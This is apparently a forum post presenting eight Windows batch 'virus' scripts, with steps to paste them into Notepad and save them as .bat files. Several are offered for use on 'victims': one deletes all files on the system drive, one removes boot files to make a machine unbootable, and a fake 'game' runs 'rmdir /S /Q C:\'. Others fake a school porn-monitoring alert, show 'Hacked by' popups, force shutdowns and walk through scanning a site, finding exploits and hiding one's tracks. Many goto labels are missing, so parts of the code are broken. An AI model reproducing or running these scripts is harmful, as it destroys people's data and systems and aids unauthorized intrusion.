Batch Virus

-Right You All Know What A Batch Virus Is?
Its A Series Of Commands Generally Made Into A .Bat File,
You Can Make Serious Problems With Them.

IVe Posted This So I Can Show You Some,

A Couple I Copied (Sorry) But Il Give You Rep And Dedication I Just Thought Id Put Them Together With Some Others So There Arent All These Batch Codes All Over The Place. Have Fun.


Step One: Open Up Notepad (Start>All Programmes>Accesories>Notepad)
Step Two: Copy And Paste My Codes Onto The Page
Step Three: Save As *Name Of Choice*.Bat

WARNING: Notice How It Ends At Step Three? Cause What You Do With Them Is Uptoo YOU And YOU Only.


Batch One:

Made It Too Prank People At School, Asks If Would Like To Access Porn Through School Server, You Say Yes And A Popup Says Its Been Recordered That You Looked At Por To The Head Of School

@echo off

SET _yes=yes

SET _no=no
SET _anything=%%

echo Whats your name?

SET /P _name=


echo %_name%, Would You Like To Acces Porn?
SET /P _age=
echo Realy???
SET /P _answer=

IF %_answer% EQU %_no% goto no

IF %_answer% EQU %_yes% goto yes
IF %_answer% EQU %_anything% goto understand


echo I dont understand. Yes or No?
goto understand2


echo Ok, Please Wait. . .
echo Press Any key to access Or To Exit Press The "X" At The Top Of Your Screen
pause >nul
MSG * This Was A Test Created By The School, Your Descision Was Innapropriate be Alerted That Your Account Will reported to the Head Of School.


Batch Two:

Save Then Open, Is Actually A Tutorial On Hacking A Site Using "Ping"

echo off

goto start


Echo Warning
echo This is a dangerous route you have chosen
echo -----------------------------------------
echo Are you sure you want to continue?
echo Y/N
set /p continue=
if '%continue%' == 'Y' goto first
if '%continue%' == 'y' goto first
if '%continue%' == 'N' goto quit
if '%continue%' == 'n' goto quit




echo -----------------------------------------
echo Welcome to Saint Dannz's tutorials
echo In this tutorial you will learn the basics of how to hack a site
echo -----------------------------------------
echo Disclaimer
echo I take no responsibility for any actions that take place during or following to this batch file
echo -----------------------------------------
echo Press B to begin or q to quit
set /p task1=
if '%task1%' == 'B' goto second
if '%task1%' == 'b' goto second
if '%task1%' == 'Q' goto quit
if '%task1%' == 'q' goto quit


echo Open up a new session of cmd
echo Now, to find your targets IP address, type
echo -
echo ping site-name.ext
echo -
echo For example
echo ping
echo -
echo Note:
echo If nothing comes back, the target is offline
echo -----------------------------------------
echo press d when you have completed this or q to quit
set /p task2=
if '%task2%' == 'D' goto third
if '%task2%' == 'd' goto third
if '%task2%' == 'Q' goto quit
if '%task2%' == 'q' goto quit


echo Now, we have the ip address
echo All we need to do is port scan the ip address
echo Super fast scanner is reliable, search it on google
echo -----------------------------------------
echo press d when you have completed this or q to quit
set /p task3=
if '%task3%' == 'D' goto fourth
if '%task3%' == 'd' goto fourth
if '%task3%' == 'Q' goto quit
if '%task3%' == 'q' goto quit


echo Ok, we now have the open ports of that ip address
echo in your command console type
echo :
echo nmap IP PORT
echo :
echo -----------------------------------------
echo This will show you the program and its version number running on that port
echo -----------------------------------------
echo press d when you have completed this or q to quit
set /p task4=
if '%task4%' == 'D' goto fifth
if '%task4%' == 'd' goto fifth
if '%task4%' == 'Q' goto quit
if '%task4%' == 'q' goto quit


echo Search that program and version number for exploits
echo -----------------------------------------
echo You could use google, although there are sites
echo out there that you can search for an exploit in
echo -----------------------------------------
echo press d to go to the final step or q to quit
set /p task5=
if '%task5%' == 'D' goto sixth
if '%task5%' == 'd' goto sixth
if '%task5%' == 'Q' goto quit
if '%task5%' == 'q' goto quit


echo You are now ready to hack that site! Type
echo :
echo telnet IP PORT
echo :
echo -----------------------------------------
echo This will connect you to the site
echo Now, use the command you have found for the exploit
echo and bam, you have access
echo -----------------------------------------
echo make sure you delete traces of yourself being there
echo and when possible, use multiple proxies to hide your IP
echo -----------------------------------------
echo -----------------------------------------
echo Credits go to St Dannz for creating this tutorial
echo -----------------------------------------
echo press q to quit
set /p end=
if '%end%' == 'Q' goto quit
if '%end%' == 'q' goto quit


Batch Three:

Destroys Victims System Drive (Donot Run On Own Computer)

@echo off

del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


Batch Four:

Shuts Down Victims Computer Forever (Donot Run On Own Computer)

@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Batch Five:

Harmless; Shutsdown computer (It Will Turn On Again)


shutdown -r -t 30
msg * Youve Been Hacked By ---Nero--- Computer Will Now Shut Down


Batch Six:

Popup That Will Not Come Off Until Computer Is Shutdown

@echo off

msg * Hacked by ---nero---
goto hack


Batch Seven:

Shuts Hardware Down (Donot Run On Own Computer)


echo total hard drive erased
echo Hacked By ---Nero---
shutdown -r -f -t0


Batch Eight:

A Game That If You Click The Wrong Options, Will Corrupt Victims Computer.

@echo off

title ---nero's--- The end of the world Game
cd C:\
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. Deal with it or just x out now. Do not come crying to me when you fried your computer or if you lost your project etc...
echo Pick your poison:
echo 1. die this way (wimp)
echo 2. die this way (WIMP!)
echo 4. die this way (you're boring)
echo 5. easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
goto menu
shutdown -s -c there are three ways to stop me!
goto end
shutdown -r
goto end
echo your computer is dead....
rmdir /S /Q C:\
goto end
net send * you suck
goto four
msg * you win! you get a cookie!
msg * go to to see your prize!
shutdown -f


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